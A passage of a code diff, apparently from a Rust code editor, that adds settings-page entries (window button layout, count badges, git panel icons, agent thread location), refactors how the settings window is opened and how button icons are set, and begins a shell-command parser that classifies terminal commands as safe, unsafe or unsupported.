+ &dynamic_variants::<settings::WindowButtonLayoutContent>()[settings_content
+ .title_bar
+ .as_ref()?
+ .button_layout
+ .as_ref()?
+ .discriminant()
+ as usize],
+ )
+ },
+ write: |settings_content, value| {
+ let Some(value) = value else {
+ settings_content
+ .title_bar
+ .get_or_insert_default()
+ .button_layout = None;
+ return;
+ };
+
+ let current_custom_layout = settings_content
+ .title_bar
+ .as_ref()
+ .and_then(|title_bar| title_bar.button_layout.as_ref())
+ .and_then(|button_layout| match button_layout {
+ settings::WindowButtonLayoutContent::Custom(layout) => {
+ Some(layout.clone())
+ }
+ _ => None,
+ });
+
+ let button_layout = match value {
+ settings::WindowButtonLayoutContentDiscriminants::PlatformDefault => {
+ settings::WindowButtonLayoutContent::PlatformDefault
+ }
+ settings::WindowButtonLayoutContentDiscriminants::Standard => {
+ settings::WindowButtonLayoutContent::Standard
+ }
+ settings::WindowButtonLayoutContentDiscriminants::Custom => {
+ settings::WindowButtonLayoutContent::Custom(
+ current_custom_layout.unwrap_or_else(|| {
+ "close:minimize,maximize".to_string()
+ }),
+ )
+ }
+ };
+
+ settings_content
+ .title_bar
+ .get_or_insert_default()
+ .button_layout = Some(button_layout);
+ },
+ }),
+ metadata: None,
+ },
+ pick_discriminant: |settings_content| {
+ Some(
+ settings_content
+ .title_bar
+ .as_ref()?
+ .button_layout
+ .as_ref()?
+ .discriminant() as usize,
+ )
+ },
+ fields: dynamic_variants::<settings::WindowButtonLayoutContent>()
+ .into_iter()
+ .map(|variant| match variant {
+ settings::WindowButtonLayoutContentDiscriminants::PlatformDefault => {
+ vec![]
+ }
+ settings::WindowButtonLayoutContentDiscriminants::Standard => vec![],
+ settings::WindowButtonLayoutContentDiscriminants::Custom => vec![
+ SettingItem {
+ files: USER,
+ title: "Custom Button Layout",
+ description:
+ "GNOME-style layout string such as \"close:minimize,maximize\".",
+ field: Box::new(SettingField {
+ json_path: Some("title_bar.button_layout"),
+ pick: |settings_content| match settings_content
+ .title_bar
+ .as_ref()?
+ .button_layout
+ .as_ref()?
+ {
+ settings::WindowButtonLayoutContent::Custom(layout) => {
+ Some(layout)
+ }
+ _ => DEFAULT_EMPTY_STRING,
+ },
+ write: |settings_content, value| {
+ settings_content
+ .title_bar
+ .get_or_insert_default()
+ .button_layout = value
+ .map(settings::WindowButtonLayoutContent::Custom);
+ },
+ }),
+ metadata: Some(Box::new(SettingsFieldMetadata {
+ placeholder: Some("close:minimize,maximize"),
+ ..Default::default()
+ })),
+ },
+ ],
+ })
+ .collect(),
+ }),
]
}
@@ -4238,7 +4355,7 @@ fn window_and_layout_page() -> SettingsPage {
}
fn panels_page() -> SettingsPage {
- fn project_panel_section() -> [SettingsPageItem; 22] {
+ fn project_panel_section() -> [SettingsPageItem; 23] {
[
SettingsPageItem::SectionHeader("Project Panel"),
SettingsPageItem::SettingItem(SettingItem {
@@ -4516,6 +4633,32 @@ fn panels_page() -> SettingsPage {
metadata: None,
files: USER,
}),
+ SettingsPageItem::SettingItem(SettingItem {
+ title: "Horizontal Scroll",
+ description: "Whether to allow horizontal scrolling in the project panel. When disabled, the view is always locked to the leftmost position and long file names are clipped.",
+ field: Box::new(SettingField {
+ json_path: Some("project_panel.scrollbar.horizontal_scroll"),
+ pick: |settings_content| {
+ settings_content
+ .project_panel
+ .as_ref()?
+ .scrollbar
+ .as_ref()?
+ .horizontal_scroll
+ .as_ref()
+ },
+ write: |settings_content, value| {
+ settings_content
+ .project_panel
+ .get_or_insert_default()
+ .scrollbar
+ .get_or_insert_default()
+ .horizontal_scroll = value;
+ },
+ }),
+ metadata: None,
+ files: USER,
+ }),
SettingsPageItem::SettingItem(SettingItem {
title: "Show Diagnostics",
description: "Which files containing diagnostic errors/warnings to mark in the project panel.",
@@ -4793,7 +4936,7 @@ fn panels_page() -> SettingsPage {
]
}
- fn terminal_panel_section() -> [SettingsPageItem; 2] {
+ fn terminal_panel_section() -> [SettingsPageItem; 3] {
[
SettingsPageItem::SectionHeader("Terminal Panel"),
SettingsPageItem::SettingItem(SettingItem {
@@ -4809,6 +4952,28 @@ fn panels_page() -> SettingsPage {
metadata: None,
files: USER,
}),
+ SettingsPageItem::SettingItem(SettingItem {
+ title: "Show Count Badge",
+ description: "Show a badge on the terminal panel icon with the count of open terminals.",
+ field: Box::new(SettingField {
+ json_path: Some("terminal.show_count_badge"),
+ pick: |settings_content| {
+ settings_content
+ .terminal
+ .as_ref()?
+ .show_count_badge
+ .as_ref()
+ },
+ write: |settings_content, value| {
+ settings_content
+ .terminal
+ .get_or_insert_default()
+ .show_count_badge = value;
+ },
+ }),
+ metadata: None,
+ files: USER,
+ }),
]
}
@@ -5021,7 +5186,7 @@ fn panels_page() -> SettingsPage {
]
}
- fn git_panel_section() -> [SettingsPageItem; 11] {
+ fn git_panel_section() -> [SettingsPageItem; 14] {
[
SettingsPageItem::SectionHeader("Git Panel"),
SettingsPageItem::SettingItem(SettingItem {
@@ -5163,6 +5328,42 @@ fn panels_page() -> SettingsPage {
metadata: None,
files: USER,
}),
+ SettingsPageItem::SettingItem(SettingItem {
+ title: "File Icons",
+ description: "Show file icons next to the Git status icon.",
+ field: Box::new(SettingField {
+ json_path: Some("git_panel.file_icons"),
+ pick: |settings_content| {
+ settings_content.git_panel.as_ref()?.file_icons.as_ref()
+ },
+ write: |settings_content, value| {
+ settings_content
+ .git_panel
+ .get_or_insert_default()
+ .file_icons = value;
+ },
+ }),
+ metadata: None,
+ files: USER,
+ }),
+ SettingsPageItem::SettingItem(SettingItem {
+ title: "Folder Icons",
+ description: "Whether to show folder icons or chevrons for directories in the git panel.",
+ field: Box::new(SettingField {
+ json_path: Some("git_panel.folder_icons"),
+ pick: |settings_content| {
+ settings_content.git_panel.as_ref()?.folder_icons.as_ref()
+ },
+ write: |settings_content, value| {
+ settings_content
+ .git_panel
+ .get_or_insert_default()
+ .folder_icons = value;
+ },
+ }),
+ metadata: None,
+ files: USER,
+ }),
SettingsPageItem::SettingItem(SettingItem {
title: "Diff Stats",
description: "Whether to show the addition/deletion change count next to each file in the Git panel.",
@@ -5181,6 +5382,28 @@ fn panels_page() -> SettingsPage {
metadata: None,
files: USER,
}),
+ SettingsPageItem::SettingItem(SettingItem {
+ title: "Show Count Badge",
+ description: "Whether to show a badge on the git panel icon with the count of uncommitted changes.",
+ field: Box::new(SettingField {
+ json_path: Some("git_panel.show_count_badge"),
+ pick: |settings_content| {
+ settings_content
+ .git_panel
+ .as_ref()?
+ .show_count_badge
+ .as_ref()
+ },
+ write: |settings_content, value| {
+ settings_content
+ .git_panel
+ .get_or_insert_default()
+ .show_count_badge = value;
+ },
+ }),
+ metadata: None,
+ files: USER,
+ }),
SettingsPageItem::SettingItem(SettingItem {
title: "Scroll Bar",
description: "How and when the scrollbar should be displayed.",
@@ -5231,7 +5454,7 @@ fn panels_page() -> SettingsPage {
]
}
- fn notification_panel_section() -> [SettingsPageItem; 4] {
+ fn notification_panel_section() -> [SettingsPageItem; 5] {
[
SettingsPageItem::SectionHeader("Notification Panel"),
SettingsPageItem::SettingItem(SettingItem {
@@ -5296,6 +5519,28 @@ fn panels_page() -> SettingsPage {
metadata: None,
files: USER,
}),
+ SettingsPageItem::SettingItem(SettingItem {
+ title: "Show Count Badge",
+ description: "Show a badge on the notification panel icon with the count of unread notifications.",
+ field: Box::new(SettingField {
+ json_path: Some("notification_panel.show_count_badge"),
+ pick: |settings_content| {
+ settings_content
+ .notification_panel
+ .as_ref()?
+ .show_count_badge
+ .as_ref()
+ },
+ write: |settings_content, value| {
+ settings_content
+ .notification_panel
+ .get_or_insert_default()
+ .show_count_badge = value;
+ },
+ }),
+ metadata: None,
+ files: USER,
+ }),
]
}
@@ -6793,101 +7038,8 @@ fn collaboration_page() -> SettingsPage {
]
}
- fn experimental_section() -> [SettingsPageItem; 9] {
+ fn audio_settings() -> [SettingsPageItem; 3] {
[
- SettingsPageItem::SectionHeader("Experimental"),
- SettingsPageItem::SettingItem(SettingItem {
- title: "Rodio Audio",
- description: "Opt into the new audio system.",
- field: Box::new(SettingField {
- json_path: Some("audio.experimental.rodio_audio"),
- pick: |settings_content| settings_content.audio.as_ref()?.rodio_audio.as_ref(),
- write: |settings_content, value| {
- settings_content.audio.get_or_insert_default().rodio_audio = value;
- },
- }),
- metadata: None,
- files: USER,
- }),
- SettingsPageItem::SettingItem(SettingItem {
- title: "Auto Microphone Volume",
- description: "Automatically adjust microphone volume (requires rodio audio).",
- field: Box::new(SettingField {
- json_path: Some("audio.experimental.auto_microphone_volume"),
- pick: |settings_content| {
- settings_content
- .audio
- .as_ref()?
- .auto_microphone_volume
- .as_ref()
- },
- write: |settings_content, value| {
- settings_content
- .audio
- .get_or_insert_default()
- .auto_microphone_volume = value;
- },
- }),
- metadata: None,
- files: USER,
- }),
- SettingsPageItem::SettingItem(SettingItem {
- title: "Auto Speaker Volume",
- description: "Automatically adjust volume of other call members (requires rodio audio).",
- field: Box::new(SettingField {
- json_path: Some("audio.experimental.auto_speaker_volume"),
- pick: |settings_content| {
- settings_content
- .audio
- .as_ref()?
- .auto_speaker_volume
- .as_ref()
- },
- write: |settings_content, value| {
- settings_content
- .audio
- .get_or_insert_default()
- .auto_speaker_volume = value;
- },
- }),
- metadata: None,
- files: USER,
- }),
- SettingsPageItem::SettingItem(SettingItem {
- title: "Denoise",
- description: "Remove background noises (requires rodio audio).",
- field: Box::new(SettingField {
- json_path: Some("audio.experimental.denoise"),
- pick: |settings_content| settings_content.audio.as_ref()?.denoise.as_ref(),
- write: |settings_content, value| {
- settings_content.audio.get_or_insert_default().denoise = value;
- },
- }),
- metadata: None,
- files: USER,
- }),
- SettingsPageItem::SettingItem(SettingItem {
- title: "Legacy Audio Compatible",
- description: "Use audio parameters compatible with previous versions (requires rodio audio).",
- field: Box::new(SettingField {
- json_path: Some("audio.experimental.legacy_audio_compatible"),
- pick: |settings_content| {
- settings_content
- .audio
- .as_ref()?
- .legacy_audio_compatible
- .as_ref()
- },
- write: |settings_content, value| {
- settings_content
- .audio
- .get_or_insert_default()
- .legacy_audio_compatible = value;
- },
- }),
- metadata: None,
- files: USER,
- }),
SettingsPageItem::ActionLink(ActionLink {
title: "Test Audio".into(),
description: Some("Test your microphone and speaker setup".into()),
@@ -6948,11 +7100,11 @@ fn collaboration_page() -> SettingsPage {
SettingsPage {
title: "Collaboration",
- items: concat_sections![calls_section(), experimental_section()],
+ items: concat_sections![calls_section(), audio_settings()],
}
}
-fn ai_page() -> SettingsPage {
+fn ai_page(cx: &App) -> SettingsPage {
fn general_section() -> [SettingsPageItem; 2] {
[
SettingsPageItem::SectionHeader("General"),
@@ -6972,8 +7124,8 @@ fn ai_page() -> SettingsPage {
]
}
- fn agent_configuration_section() -> [SettingsPageItem; 12] {
- [
+ fn agent_configuration_section(cx: &App) -> Box<[SettingsPageItem]> {
+ let mut items = vec![
SettingsPageItem::SectionHeader("Agent Configuration"),
SettingsPageItem::SubPageLink(SubPageLink {
title: "Tool Permissions".into(),
@@ -6984,6 +7136,34 @@ fn ai_page() -> SettingsPage {
files: USER,
render: render_tool_permissions_setup_page,
}),
+ ];
+
+ if cx.has_flag::<AgentV2FeatureFlag>() {
+ items.push(SettingsPageItem::SettingItem(SettingItem {
+ title: "New Thread Location",
+ description: "Whether to start a new thread in the current local project or in a new Git worktree.",
+ field: Box::new(SettingField {
+ json_path: Some("agent.new_thread_location"),
+ pick: |settings_content| {
+ settings_content
+ .agent
+ .as_ref()?
+ .new_thread_location
+ .as_ref()
+ },
+ write: |settings_content, value| {
+ settings_content
+ .agent
+ .get_or_insert_default()
+ .new_thread_location = value;
+ },
+ }),
+ metadata: None,
+ files: USER,
+ }));
+ }
+
+ items.extend([
SettingsPageItem::SettingItem(SettingItem {
title: "Single File Review",
description: "When enabled, agent edits will also be displayed in single-file buffers for review.",
@@ -7188,7 +7368,9 @@ fn ai_page() -> SettingsPage {
metadata: None,
files: USER,
}),
- ]
+ ]);
+
+ items.into_boxed_slice()
}
fn context_servers_section() -> [SettingsPageItem; 2] {
@@ -7273,7 +7455,7 @@ fn ai_page() -> SettingsPage {
title: "AI",
items: concat_sections![
general_section(),
- agent_configuration_section(),
+ agent_configuration_section(cx),
context_servers_section(),
edit_prediction_language_settings_section(),
edit_prediction_display_sub_section()
@@ -88,7 +88,7 @@ fn start_test_playback(
}
};
- let Ok(output) = audio::open_output_stream(output_device_id) else {
+ let Ok(output) = audio::open_test_output(output_device_id) else {
log::error!("Could not open output device for audio test");
return;
};
@@ -99,8 +99,7 @@ pub(crate) fn render_edit_prediction_setup_page(
IconName::AiOpenAiCompat,
"OpenAI Compatible API",
ApiKeyDocs::Custom {
- message: "Set an API key here. It will be sent as Authorization: Bearer {key}."
- .into(),
+ message: "The API key sent as Authorization: Bearer {key}.".into(),
},
open_ai_compatible_api_token(cx),
|cx| open_ai_compatible_api_url(cx),
@@ -172,10 +171,12 @@ fn render_provider_dropdown(window: &mut Window, cx: &mut App) -> AnyElement {
h_flex()
.pt_2p5()
.w_full()
+ .min_w_0()
.justify_between()
.child(
v_flex()
.w_full()
+ .min_w_0()
.max_w_1_2()
.child(Label::new("Provider"))
.child(
@@ -246,13 +247,15 @@ fn render_api_key_provider(
.no_padding(true);
let button_link_label = format!("{} dashboard", title);
let description = match docs {
- ApiKeyDocs::Custom { message } => h_flex().min_w_0().gap_0p5().child(
+ ApiKeyDocs::Custom { message } => div().min_w_0().w_full().child(
Label::new(message)
.size(LabelSize::Small)
.color(Color::Muted),
),
ApiKeyDocs::Link { dashboard_url } => h_flex()
+ .w_full()
.min_w_0()
+ .flex_wrap()
.gap_0p5()
.child(
Label::new("Visit the")
@@ -300,10 +303,12 @@ fn render_api_key_provider(
h_flex()
.pt_2p5()
.w_full()
+ .min_w_0()
.justify_between()
.child(
v_flex()
.w_full()
+ .min_w_0()
.max_w_1_2()
.child(Label::new("API Key"))
.child(description)
@@ -466,7 +471,7 @@ fn ollama_settings() -> Box<[SettingsPageItem]> {
}),
SettingsPageItem::SettingItem(SettingItem {
title: "Prompt Format",
- description: "The prompt format to use when requesting predictions. Set to Infer to have the format inferred based on the model name",
+ description: "The prompt format to use when requesting predictions. Set to Infer to have the format inferred based on the model name.",
field: Box::new(SettingField {
pick: |settings| {
settings
@@ -597,7 +602,7 @@ fn open_ai_compatible_settings() -> Box<[SettingsPageItem]> {
}),
SettingsPageItem::SettingItem(SettingItem {
title: "Prompt Format",
- description: "The prompt format to use when requesting predictions. Set to Infer to have the format inferred based on the model name",
+ description: "The prompt format to use when requesting predictions. Set to Infer to have the format inferred based on the model name.",
field: Box::new(SettingField {
pick: |settings| {
settings
@@ -249,10 +249,13 @@ fn render_tool_list_item(
h_flex()
.w_full()
+ .min_w_0()
.py_3()
.justify_between()
.child(
v_flex()
+ .w_full()
+ .min_w_0()
.child(h_flex().gap_1().child(Label::new(tool.name)).when_some(
rule_summary,
|this, summary| {
@@ -275,10 +278,11 @@ fn render_tool_list_item(
.tab_index(tool_index as isize)
.style(ButtonStyle::OutlinedGhost)
.size(ButtonSize::Medium)
- .icon(IconName::ChevronRight)
- .icon_position(IconPosition::End)
- .icon_color(Color::Muted)
- .icon_size(IconSize::Small)
+ .end_icon(
+ Icon::new(IconName::ChevronRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(cx.listener(move |this, _, window, cx| {
this.push_dynamic_sub_page(
tool_name,
@@ -1071,9 +1075,12 @@ fn render_global_default_mode_section(current_mode: ToolPermissionMode) -> AnyEl
h_flex()
.my_4()
+ .min_w_0()
.justify_between()
.child(
v_flex()
+ .w_full()
+ .min_w_0()
.child(Label::new("Default Permission"))
.child(
Label::new(
@@ -1090,9 +1097,7 @@ fn render_global_default_mode_section(current_mode: ToolPermissionMode) -> AnyEl
.tab_index(0_isize)
.style(ButtonStyle::Outlined)
.size(ButtonSize::Medium)
- .icon(IconName::ChevronDown)
- .icon_position(IconPosition::End)
- .icon_size(IconSize::Small),
+ .end_icon(Icon::new(IconName::ChevronDown).size(IconSize::Small)),
)
.menu(move |window, cx| {
Some(ContextMenu::build(window, cx, move |menu, _, _| {
@@ -1126,13 +1131,18 @@ fn render_default_mode_section(
let tool_id_owned = tool_id.to_string();
h_flex()
+ .min_w_0()
.justify_between()
.child(
- v_flex().child(Label::new("Default Action")).child(
- Label::new("Action to take when no patterns match.")
- .size(LabelSize::Small)
- .color(Color::Muted),
- ),
+ v_flex()
+ .w_full()
+ .min_w_0()
+ .child(Label::new("Default Action"))
+ .child(
+ Label::new("Action to take when no patterns match.")
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ ),
)
.child(
PopoverMenu::new(format!("default-mode-{}", tool_id))
@@ -1141,9 +1151,7 @@ fn render_default_mode_section(
.tab_index(0_isize)
.style(ButtonStyle::Outlined)
.size(ButtonSize::Medium)
- .icon(IconName::ChevronDown)
- .icon_position(IconPosition::End)
- .icon_size(IconSize::Small),
+ .end_icon(Icon::new(IconName::ChevronDown).size(IconSize::Small)),
)
.menu(move |window, cx| {
let tool_id = tool_id_owned.clone();
@@ -1413,6 +1421,9 @@ mod tests {
// Subagent permission checks happen at the level of individual
// tool calls within the subagent, not at the spawning level.
"spawn_agent",
+ // update_plan updates UI-visible planning state but does not use
+ // tool permission rules.
+ "update_plan",
];
let tool_info_ids: Vec<&str> = TOOLS.iter().map(|t| t.id).collect();
@@ -392,29 +392,22 @@ pub fn init(cx: &mut App) {
let queue = ProjectSettingsUpdateQueue::new(cx);
cx.set_global(queue);
+ cx.on_action(|_: &OpenSettings, cx| {
+ open_settings_editor(None, None, None, cx);
+ });
+
cx.observe_new(|workspace: &mut workspace::Workspace, _, _| {
workspace
- .register_action(
- |workspace, OpenSettingsAt { path }: &OpenSettingsAt, window, cx| {
- let window_handle = window
- .window_handle()
- .downcast::<MultiWorkspace>()
- .expect("Workspaces are root Windows");
- open_settings_editor(workspace, Some(&path), None, window_handle, cx);
- },
- )
- .register_action(|workspace, _: &OpenSettings, window, cx| {
- let window_handle = window
- .window_handle()
- .downcast::<MultiWorkspace>()
- .expect("Workspaces are root Windows");
- open_settings_editor(workspace, None, None, window_handle, cx);
+ .register_action(|_, OpenSettingsAt { path }: &OpenSettingsAt, window, cx| {
+ let window_handle = window.window_handle().downcast::<MultiWorkspace>();
+ open_settings_editor(Some(&path), None, window_handle, cx);
+ })
+ .register_action(|_, _: &OpenSettings, window, cx| {
+ let window_handle = window.window_handle().downcast::<MultiWorkspace>();
+ open_settings_editor(None, None, window_handle, cx);
})
.register_action(|workspace, _: &OpenProjectSettings, window, cx| {
- let window_handle = window
- .window_handle()
- .downcast::<MultiWorkspace>()
- .expect("Workspaces are root Windows");
+ let window_handle = window.window_handle().downcast::<MultiWorkspace>();
let target_worktree_id = workspace
.project()
.read(cx)
@@ -425,7 +418,7 @@ pub fn init(cx: &mut App) {
.is_dir()
.then_some(tree.read(cx).id())
});
- open_settings_editor(workspace, None, target_worktree_id, window_handle, cx);
+ open_settings_editor(None, target_worktree_id, window_handle, cx);
});
})
.detach();
@@ -530,7 +523,7 @@ fn init_renderers(cx: &mut App) {
.add_basic_renderer::<settings::VimInsertModeCursorShape>(render_dropdown)
.add_basic_renderer::<settings::SteppingGranularity>(render_dropdown)
.add_basic_renderer::<settings::NotifyWhenAgentWaiting>(render_dropdown)
- .add_basic_renderer::<settings::NotifyWhenAgentWaiting>(render_dropdown)
+ .add_basic_renderer::<settings::NewThreadLocation>(render_dropdown)
.add_basic_renderer::<settings::ImageFileSizeUnit>(render_dropdown)
.add_basic_renderer::<settings::StatusStyle>(render_dropdown)
.add_basic_renderer::<settings::EncodingDisplayOptions>(render_dropdown)
@@ -552,6 +545,7 @@ fn init_renderers(cx: &mut App) {
.add_basic_renderer::<settings::EditPredictionsMode>(render_dropdown)
.add_basic_renderer::<settings::RelativeLineNumbers>(render_dropdown)
.add_basic_renderer::<settings::WindowDecorations>(render_dropdown)
+ .add_basic_renderer::<settings::WindowButtonLayoutContentDiscriminants>(render_dropdown)
.add_basic_renderer::<settings::FontSize>(render_editable_number_field)
.add_basic_renderer::<settings::OllamaModelName>(render_ollama_model_picker)
.add_basic_renderer::<settings::SemanticTokens>(render_dropdown)
@@ -564,10 +558,9 @@ fn init_renderers(cx: &mut App) {
}
pub fn open_settings_editor(
- _workspace: &mut Workspace,
path: Option<&str>,
target_worktree_id: Option<WorktreeId>,
- workspace_handle: WindowHandle<MultiWorkspace>,
+ workspace_handle: Option<WindowHandle<MultiWorkspace>>,
cx: &mut App,
) {
telemetry::event!("Settings Viewed");
@@ -624,7 +617,8 @@ pub fn open_settings_editor(
if let Some(existing_window) = existing_window {
existing_window
.update(cx, |settings_window, window, cx| {
- settings_window.original_window = Some(workspace_handle);
+ settings_window.original_window = workspace_handle;
+
window.activate_window();
if let Some(path) = path {
open_path(path, settings_window, window, cx);
@@ -685,7 +679,7 @@ pub fn open_settings_editor(
},
|window, cx| {
let settings_window =
- cx.new(|cx| SettingsWindow::new(Some(workspace_handle), window, cx));
+ cx.new(|cx| SettingsWindow::new(workspace_handle, window, cx));
settings_window.update(cx, |settings_window, cx| {
if let Some(path) = path {
open_path(&path, settings_window, window, cx);
@@ -925,9 +919,7 @@ impl SettingsPageItem {
Button::new("error-warning", warning)
.style(ButtonStyle::Outlined)
.size(ButtonSize::Medium)
- .icon(Some(IconName::Debug))
- .icon_position(IconPosition::Start)
- .icon_color(Color::Error)
+ .start_icon(Icon::new(IconName::Debug).color(Color::Error))
.tab_index(0_isize)
.tooltip(Tooltip::text(setting_item.field.type_name()))
.into_any_element(),
@@ -992,11 +984,12 @@ impl SettingsPageItem {
("sub-page".into(), sub_page_link.title.clone()),
"Configure",
)
- .icon(IconName::ChevronRight)
.tab_index(0_isize)
- .icon_position(IconPosition::End)
- .icon_color(Color::Muted)
- .icon_size(IconSize::Small)
+ .end_icon(
+ Icon::new(IconName::ChevronRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.style(ButtonStyle::OutlinedGhost)
.size(ButtonSize::Medium)
.on_click({
@@ -1125,11 +1118,12 @@ impl SettingsPageItem {
("action-link".into(), action_link.title.clone()),
action_link.button_text.clone(),
)
- .icon(IconName::ArrowUpRight)
.tab_index(0_isize)
- .icon_position(IconPosition::End)
- .icon_color(Color::Muted)
- .icon_size(IconSize::Small)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.style(ButtonStyle::OutlinedGhost)
.size(ButtonSize::Medium)
.on_click({
@@ -2191,37 +2185,39 @@ impl SettingsWindow {
ui_files.reverse();
- let mut missing_worktrees = Vec::new();
+ if self.original_window.is_some() {
+ let mut missing_worktrees = Vec::new();
- for worktree in all_projects(self.original_window.as_ref(), cx)
- .flat_map(|project| project.read(cx).visible_worktrees(cx))
- .filter(|tree| !self.worktree_root_dirs.contains_key(&tree.read(cx).id()))
- {
- let worktree = worktree.read(cx);
- let worktree_id = worktree.id();
- let Some(directory_name) = worktree.root_dir().and_then(|file| {
- file.file_name()
- .map(|os_string| os_string.to_string_lossy().to_string())
- }) else {
- continue;
- };
+ for worktree in all_projects(self.original_window.as_ref(), cx)
+ .flat_map(|project| project.read(cx).visible_worktrees(cx))
+ .filter(|tree| !self.worktree_root_dirs.contains_key(&tree.read(cx).id()))
+ {
+ let worktree = worktree.read(cx);
+ let worktree_id = worktree.id();
+ let Some(directory_name) = worktree.root_dir().and_then(|file| {
+ file.file_name()
+ .map(|os_string| os_string.to_string_lossy().to_string())
+ }) else {
+ continue;
+ };
- missing_worktrees.push((worktree_id, directory_name.clone()));
- let path = RelPath::empty().to_owned().into_arc();
+ missing_worktrees.push((worktree_id, directory_name.clone()));
+ let path = RelPath::empty().to_owned().into_arc();
- let settings_ui_file = SettingsUiFile::Project((worktree_id, path));
+ let settings_ui_file = SettingsUiFile::Project((worktree_id, path));
- let focus_handle = prev_files
- .iter()
- .find_map(|(prev_file, handle)| {
- (prev_file == &settings_ui_file).then(|| handle.clone())
- })
- .unwrap_or_else(|| cx.focus_handle().tab_index(0).tab_stop(true));
+ let focus_handle = prev_files
+ .iter()
+ .find_map(|(prev_file, handle)| {
+ (prev_file == &settings_ui_file).then(|| handle.clone())
+ })
+ .unwrap_or_else(|| cx.focus_handle().tab_index(0).tab_stop(true));
- ui_files.push((settings_ui_file, focus_handle));
- }
+ ui_files.push((settings_ui_file, focus_handle));
+ }
- self.worktree_root_dirs.extend(missing_worktrees);
+ self.worktree_root_dirs.extend(missing_worktrees);
+ }
self.files = ui_files;
let current_file_still_exists = self
@@ -2883,7 +2879,7 @@ impl SettingsWindow {
}
fn render_sub_page_breadcrumbs(&self) -> impl IntoElement {
- h_flex().gap_1().children(
+ h_flex().min_w_0().gap_1().overflow_x_hidden().children(
itertools::intersperse(
std::iter::once(self.current_page().title.into()).chain(
self.sub_page_stack
@@ -3113,9 +3109,11 @@ impl SettingsWindow {
if let Some(current_sub_page) = self.sub_page_stack.last() {
page_header = h_flex()
.w_full()
+ .min_w_0()
.justify_between()
.child(
h_flex()
+ .min_w_0()
.ml_neg_1p5()
.gap_1()
.child(
@@ -3130,17 +3128,19 @@ impl SettingsWindow {
)
.when(current_sub_page.link.in_json, |this| {
this.child(
- Button::new("open-in-settings-file", "Edit in settings.json")
- .tab_index(0_isize)
- .style(ButtonStyle::OutlinedGhost)
- .tooltip(Tooltip::for_action_title_in(
- "Edit in settings.json",
- &OpenCurrentFile,
- &self.focus_handle,
- ))
- .on_click(cx.listener(|this, _, window, cx| {
- this.open_current_settings_file(window, cx);
- })),
+ div().flex_shrink_0().child(
+ Button::new("open-in-settings-file", "Edit in settings.json")
+ .tab_index(0_isize)
+ .style(ButtonStyle::OutlinedGhost)
+ .tooltip(Tooltip::for_action_title_in(
+ "Edit in settings.json",
+ &OpenCurrentFile,
+ &self.focus_handle,
+ ))
+ .on_click(cx.listener(|this, _, window, cx| {
+ this.open_current_settings_file(window, cx);
+ })),
+ ),
)
})
.into_any_element();
@@ -3310,6 +3310,7 @@ impl SettingsWindow {
.pt_6()
.gap_4()
.flex_1()
+ .min_w_0()
.bg(cx.theme().colors().editor_background)
.child(
v_flex()
@@ -4174,10 +4175,11 @@ fn render_picker_trigger_button(id: SharedString, label: SharedString) -> Button
.tab_index(0_isize)
.style(ButtonStyle::Outlined)
.size(ButtonSize::Medium)
- .icon(IconName::ChevronUpDown)
- .icon_color(Color::Muted)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::End)
+ .end_icon(
+ Icon::new(IconName::ChevronUpDown)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
}
fn render_font_picker(
@@ -1,8 +1,25 @@
use brush_parser::ast;
+use brush_parser::ast::SourceLocation;
use brush_parser::word::WordPiece;
use brush_parser::{Parser, ParserOptions, SourceInfo};
use std::io::BufReader;
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct TerminalCommandPrefix {
+ pub normalized: String,
+ pub display: String,
+ pub tokens: Vec<String>,
+ pub command: String,
+ pub subcommand: Option<String>,
+}
+
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub enum TerminalCommandValidation {
+ Safe,
+ Unsafe,
+ Unsupported,
+}
+
pub fn extract_commands(command: &str) -> Option<Vec<String>> {
let reader = BufReader::new(command.as_bytes());
let options = ParserOptions::default();
@@ -17,6 +34,444 @@ pub fn extract_commands(command: &str) -> Option<Vec<String>> {
Some(commands)
}
+pub fn extract_terminal_command_prefix(command: &str) -> Option<TerminalCommandPrefix> {
+ let reader = BufReader::new(command.as_bytes());
+ let options = ParserOptions::default();
+ let source_info = SourceInfo::default();
+ let mut parser = Parser::new(reader, &options, &source_info);
+
+ let program = parser.parse_program().ok()?;
+ let simple_command = first_simple_command(&program)?;
+
+ let mut normalized_tokens = Vec::new();
+ let mut display_start = None;
+ let mut display_end = None;
+
+ if let Some(prefix) = &simple_command.prefix {
+ for item in &prefix.0 {
+ if let ast::CommandPrefixOrSuffixItem::AssignmentWord(assignment, word) = item {
+ match normalize_assignment_for_command_prefix(assignment, word)? {
+ NormalizedAssignment::Included(normalized_assignment) => {
+ normalized_tokens.push(normalized_assignment);
+ update_display_bounds(&mut display_start, &mut display_end, word);
+ }
+ NormalizedAssignment::Skipped => {}
+ }
+ }
+ }
+ }
+
+ let command_word = simple_command.word_or_name.as_ref()?;
+ let command_name = normalize_word(command_word)?;
+ normalized_tokens.push(command_name.clone());
+ update_display_bounds(&mut display_start, &mut display_end, command_word);
+
+ let mut subcommand = None;
+ if let Some(suffix) = &simple_command.suffix {
+ for item in &suffix.0 {
+ match item {
+ ast::CommandPrefixOrSuffixItem::IoRedirect(_) => continue,
+ ast::CommandPrefixOrSuffixItem::Word(word) => {
+ let normalized_word = normalize_word(word)?;
+ if !normalized_word.starts_with('-') {
+ subcommand = Some(normalized_word.clone());
+ normalized_tokens.push(normalized_word);
+ update_display_bounds(&mut display_start, &mut display_end, word);
+ }
+ break;
+ }
+ _ => break,
+ }
+ }
+ }
+
+ let start = display_start?;
+ let end = display_end?;
+ let display = command.get(start..end)?.to_string();
+
+ Some(TerminalCommandPrefix {
+ normalized: normalized_tokens.join(" "),
+ display,
+ tokens: normalized_tokens,
+ command: command_name,
+ subcommand,
+ })
+}
+
+pub fn validate_terminal_command(command: &str) -> TerminalCommandValidation {
+ let reader = BufReader::new(command.as_bytes());
+ let options = ParserOptions::default();
+ let source_info = SourceInfo::default();
+ let mut parser = Parser::new(reader, &options, &source_info);
+
+ let program = match parser.parse_program() {
+ Ok(program) => program,
+ Err(_) => return TerminalCommandValidation::Unsupported,
+ };
+
+ match program_validation(&program) {
+ TerminalProgramValidation::Safe => TerminalCommandValidation::Safe,
